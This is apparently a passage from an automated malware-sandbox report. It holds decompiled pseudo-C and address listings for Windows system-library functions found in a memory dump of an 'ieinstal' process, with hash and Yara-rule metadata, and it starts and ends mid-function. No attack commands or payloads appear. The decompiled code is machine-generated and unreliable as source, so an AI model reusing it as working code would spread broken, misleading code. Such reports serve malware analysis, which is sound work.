						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E1ED853CA(0);
						return E1ED5D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E1ED4F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E1ED23690(1, _t117, 0x1ece1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E1ED4AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L1ED24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E1ED4AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E1ED8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E1ED49860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                        0x1ed851be
                        0x1ed851c3
                        0x1ed851c8
                        0x1ed851cd
                        0x1ed851d0
                        0x1ed851d3
                        0x1ed851d8
                        0x1ed851db
                        0x1ed851de
                        0x1ed851e0
                        0x1ed851e3
                        0x1ed851e6
                        0x1ed851e8
                        0x1ed85342
                        0x1ed85351
                        0x1ed85356
                        0x1ed8535a
                        0x1ed85360
                        0x1ed85363
                        0x1ed85366
                        0x1ed85369
                        0x1ed85369
                        0x1ed8536b
                        0x1ed8536b
                        0x1ed85370
                        0x1ed853a3
                        0x1ed853a4
                        0x1ed853a6
                        0x1ed853ab
                        0x1ed853ab
                        0x1ed853ae
                        0x1ed853ae
                        0x1ed853b5
                        0x1ed853bf
                        0x1ed853bf
                        0x1ed85375
                        0x1ed85396
                        0x1ed853a0
                        0x1ed853a0
                        0x00000000
                        0x1ed85396
                        0x1ed85377
                        0x1ed85379
                        0x1ed8537f
                        0x1ed8538c
                        0x1ed85390
                        0x00000000
                        0x1ed85390
                        0x1ed851ee
                        0x1ed851f1
                        0x1ed85301
                        0x1ed85310
                        0x1ed85315
                        0x1ed85318
                        0x1ed8531b
                        0x1ed85320
                        0x1ed8532e
                        0x1ed85331
                        0x00000000
                        0x1ed85331
                        0x1ed85328
                        0x1ed85329
                        0x00000000
                        0x1ed85329
                        0x1ed851fa
                        0x1ed85235
                        0x1ed85236
                        0x1ed85239
                        0x1ed8523f
                        0x1ed85240
                        0x1ed85241
                        0x1ed85242
                        0x1ed85246
                        0x1ed85247
                        0x1ed8524e
                        0x1ed85251
                        0x1ed85267
                        0x1ed85269
                        0x1ed8526e
                        0x1ed8527d
                        0x1ed8527e
                        0x1ed85281
                        0x1ed85282
                        0x1ed85287
                        0x1ed85288
                        0x1ed8528a
                        0x1ed8528f
                        0x1ed85294
                        0x00000000
                        0x00000000
                        0x1ed8529a
                        0x1ed8529c
                        0x1ed8529e
                        0x1ed8529e
                        0x1ed852a4
                        0x1ed852b0
                        0x00000000
                        0x00000000
                        0x1ed852ba
                        0x1ed852bc
                        0x1ed852bc
                        0x1ed852d4
                        0x1ed852d9
                        0x1ed852dc
                        0x1ed852e1
                        0x00000000
                        0x00000000
                        0x1ed852e7
                        0x1ed852f4
                        0x00000000
                        0x1ed852f4
                        0x1ed85270
                        0x00000000
                        0x1ed85270
                        0x1ed851fc
                        0x1ed851fd
                        0x1ed85202
                        0x1ed85203
                        0x1ed85205
                        0x1ed8520a
                        0x1ed8520f
                        0x00000000
                        0x00000000
                        0x1ed8521b
                        0x1ed85226
                        0x1ed8522b
                        0x1ed8521d
                        0x1ed8521d
                        0x1ed85222
                        0x1ed85222
                        0x1ed8522d
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: 8d3609ac3d9e8da3aa8f41f90b0aa19d4f72f810c8ca156a20bda2a04ddbf35c
                        • Instruction ID: 161c3e70f0c92c1d39b0b726a1542678107cdf42a55e28219d712cc960099405
                        • Opcode Fuzzy Hash: 8d3609ac3d9e8da3aa8f41f90b0aa19d4f72f810c8ca156a20bda2a04ddbf35c
                        • Instruction Fuzzy Hash: BC519BB1E006499FDB14CFA98940FAEBBF9BF58700F50462DE549EB295DB71A900CB20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E1ED2B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1edfd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E1ED27D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E1EDD8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E1ED49E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E1ED4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E1ED4CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E1ED27D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E1EDD8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E1ED4AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1edf8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1edf862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1edf8628; // 0x0
							_t116 =  *0x1edf862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                        0x1ed2b94c
                        0x1ed2b956
                        0x1ed2b95c
                        0x1ed2b95e
                        0x1ed2b964
                        0x1ed2b969
                        0x1ed2b96d
                        0x1ed2b96d
                        0x1ed2b970
                        0x1ed2b974
                        0x1ed2b97a
                        0x1ed2badf
                        0x1ed2badf
                        0x1ed2bae2
                        0x1ed2bae4
                        0x1ed2bae6
                        0x1ed2baf0
                        0x1ed72cb8
                        0x1ed2baf6
                        0x1ed2baf6
                        0x1ed2baf6
                        0x1ed2bafd
                        0x1ed2bb1f
                        0x1ed2bb1f
                        0x1ed2baff
                        0x1ed2bb00
                        0x1ed2bb00
                        0x1ed2bb03
                        0x1ed2bb03
                        0x1ed2bacb
                        0x1ed2bacf
                        0x1ed2bad0
                        0x1ed2bad1
                        0x1ed2badc
                        0x1ed2badc
                        0x1ed2b980
                        0x1ed2b980
                        0x1ed2b988
                        0x1ed2b98b
                        0x1ed2b98d
                        0x1ed2b990
                        0x1ed2b993
                        0x1ed2b999
                        0x1ed2b99b
                        0x1ed2b9a1
                        0x1ed2b9a5
                        0x1ed2b9aa
                        0x1ed2b9b0
                        0x1ed2b9bb
                        0x1ed2b9c0
                        0x1ed2b9c3
                        0x1ed2b9ca
                        0x1ed2b9cc
                        0x1ed2b9cf
                        0x1ed2b9d3
                        0x1ed2b9d7
                        0x1ed2ba94
                        0x1ed2ba94
                        0x1ed2ba98
                        0x1ed2baa3
                        0x1ed72ccb
                        0x1ed2baa9
                        0x1ed2baa9
                        0x1ed2baa9
                        0x1ed2bab1
                        0x1ed72cd5
                        0x1ed72cdd
                        0x1ed72cdd
                        0x1ed2babb
                        0x1ed2babc
                        0x1ed2bac2
                        0x1ed2bac3
                        0x1ed2bac3
                        0x1ed2bac6
                        0x00000000
                        0x1ed2b9dd
                        0x1ed2b9dd
                        0x1ed2b9e7
                        0x1ed2b9e7
                        0x1ed2b9ec
                        0x1ed2b9ec
                        0x1ed2b9f1
                        0x1ed2b9f5
                        0x1ed2b9fa
                        0x1ed2ba00
                        0x1ed2ba0c
                        0x1ed2ba10
                        0x1ed2ba10
                        0x1ed2ba12
                        0x1ed2ba18
                        0x00000000
                        0x00000000
                        0x1ed2bb26
                        0x1ed2bb26
                        0x1ed2ba1e
                        0x1ed2ba1e
                        0x1ed2ba23
                        0x1ed2ba25
                        0x1ed2ba2c
                        0x1ed2ba30
                        0x1ed2ba35
                        0x1ed2ba35
                        0x1ed2ba41
                        0x1ed2ba46
                        0x1ed2ba4c
                        0x1ed2ba50
                        0x1ed2ba54
                        0x1ed2ba6a
                        0x1ed2ba6e
                        0x1ed2ba70
                        0x1ed2ba74
                        0x1ed2ba78
                        0x1ed2ba7a
                        0x1ed2ba7c
                        0x1ed2ba8e
                        0x1ed2ba90
                        0x1ed2ba92
                        0x1ed2bb14
                        0x1ed2bb14
                        0x1ed2bb16
                        0x1ed2bb16
                        0x00000000
                        0x1ed2ba7c
                        0x1ed2bb0a
                        0x1ed2bb0d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed2bb0f

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1ED2B9A5
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: 7db4384d2cf3d80675a514b0f85abdedb6105a61cfbbc34a42a4608c61f01653
                        • Instruction ID: f3995d264b246d9f8f07a5e9855d670b521fa3bca82562e57558f923f8a06384
                        • Opcode Fuzzy Hash: 7db4384d2cf3d80675a514b0f85abdedb6105a61cfbbc34a42a4608c61f01653
                        • Instruction Fuzzy Hash: E7516B71A18352CFC310CF29C49091AFBE5FB88608F944A6EF9D687344D7B1E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E1ED0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1eddf7a8);
				E1ED5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E1ED5D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E1ED4D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E1ED4F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L1ED5DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E1ED4B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E1ED4B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E1ED4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E1ED4A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                        0x1ed0b171
                        0x1ed0b171
                        0x1ed0b171
                        0x1ed0b171
                        0x1ed0b171
                        0x1ed0b176
                        0x1ed0b17b
                        0x1ed0b180
                        0x1ed0b186
                        0x1ed0b18f
                        0x1ed0b198
                        0x1ed0b1a4
                        0x1ed0b1aa
                        0x1ed64802
                        0x1ed64802
                        0x1ed64805
                        0x1ed6480c
                        0x1ed6480e
                        0x1ed0b1d1
                        0x1ed0b1d3
                        0x1ed0b1de
                        0x1ed0b1de
                        0x1ed64817
                        0x1ed6481e
                        0x1ed64820
                        0x1ed64822
                        0x1ed64822
                        0x1ed64824
                        0x1ed64824
                        0x1ed6482a
                        0x00000000
                        0x00000000
                        0x1ed64835
                        0x1ed6483a
                        0x1ed6483d
                        0x1ed6483f
                        0x1ed64842
                        0x1ed64842
                        0x1ed64842
                        0x1ed64846
                        0x1ed6484c
                        0x1ed6484e
                        0x1ed64851
                        0x1ed64851
                        0x1ed64853
                        0x1ed64854
                        0x1ed64854
                        0x1ed64858
                        0x1ed6485a
                        0x1ed6485a
                        0x1ed6485d
                        0x1ed6485f
                        0x1ed64861
                        0x1ed64861
                        0x1ed64866
                        0x1ed6486b
                        0x1ed6486e
                        0x1ed64871
                        0x1ed64876
                        0x1ed64876
                        0x1ed64878
                        0x1ed6487b
                        0x1ed64884
                        0x1ed64884
                        0x00000000
                        0x1ed6487d
                        0x1ed6487d
                        0x1ed64882
                        0x1ed64889
                        0x1ed64889
                        0x1ed6488f
                        0x1ed64891
                        0x1ed648e0
                        0x1ed648e2
                        0x1ed648e4
                        0x1ed648e4
                        0x1ed648e7
                        0x1ed648e7
                        0x1ed648ed
                        0x1ed648f4
                        0x1ed648f6
                        0x1ed64951
                        0x1ed64951
                        0x1ed64953
                        0x1ed64953
                        0x1ed64956
                        0x1ed64956
                        0x1ed64958
                        0x1ed64959
                        0x1ed64959
                        0x1ed6495d
                        0x1ed6495d
                        0x1ed6495f
                        0x1ed6495f
                        0x1ed64965
                        0x1ed64969
                        0x1ed649ba
                        0x1ed649ba
                        0x1ed649c1
                        0x1ed649c5
                        0x1ed649cc
                        0x1ed649d4
                        0x1ed649d7
                        0x1ed649da
                        0x1ed649e4
                        0x1ed649e5
                        0x1ed649f3
                        0x1ed64a02
                        0x00000000
                        0x1ed64a02
                        0x1ed64972
                        0x1ed64974
                        0x00000000
                        0x00000000
                        0x1ed64976
                        0x1ed64979
                        0x1ed64982
                        0x1ed64983
                        0x1ed64984
                        0x1ed6498b
                        0x1ed6498d
                        0x1ed64991
                        0x1ed64993
                        0x1ed64999
                        0x1ed6499d
                        0x1ed649a2
                        0x1ed649a2
                        0x1ed649a2
                        0x1ed64999
                        0x1ed649ac
                        0x00000000
                        0x1ed649b3
                        0x1ed648f8
                        0x1ed648fe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed648fe
                        0x1ed64895
                        0x1ed6489c
                        0x1ed648ad
                        0x1ed648b2
                        0x1ed648b5
                        0x1ed648b7
                        0x1ed648ba
                        0x1ed648bc
                        0x1ed648c6
                        0x1ed648c6
                        0x1ed648cb
                        0x1ed648d1
                        0x1ed648d4
                        0x1ed648d8
                        0x1ed648d8
                        0x00000000
                        0x1ed648d8
                        0x1ed648be
                        0x1ed648c0
                        0x00000000
                        0x00000000
                        0x1ed648c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed648c4
                        0x00000000
                        0x1ed64882
                        0x1ed6487b
                        0x1ed64904
                        0x1ed64906
                        0x00000000
                        0x00000000
                        0x1ed64908
                        0x1ed6490e
                        0x00000000
                        0x00000000
                        0x1ed64910
                        0x1ed64917
                        0x1ed64917
                        0x00000000
                        0x1ed64917
                        0x1ed0b1ba
                        0x1ed647f9
                        0x1ed647fc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed647fc
                        0x1ed0b1c0
                        0x1ed0b1c0
                        0x1ed0b1c3
                        0x1ed0b1cb
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: ac5c12afe3d0398989555327999ea26c86c37819db9892f76490b0d15a2f6745
                        • Instruction ID: 830468bed9a1c7bda502441075e7b41c22e458eb510301d43f0ee3f38701963b
                        • Opcode Fuzzy Hash: ac5c12afe3d0398989555327999ea26c86c37819db9892f76490b0d15a2f6745
                        • Instruction Fuzzy Hash: 90510675D1029A8FDB25CF74C840BAEBBB2BF08710F2043AED859AB685D7708945CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED32581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E1ED32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t237;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				signed int _t274;
				signed int _t276;
				void* _t279;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t297;
				intOrPtr _t310;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t330;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t337;
				void* _t339;

				_t333 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x1edfd360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t326 = 0x1edfb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
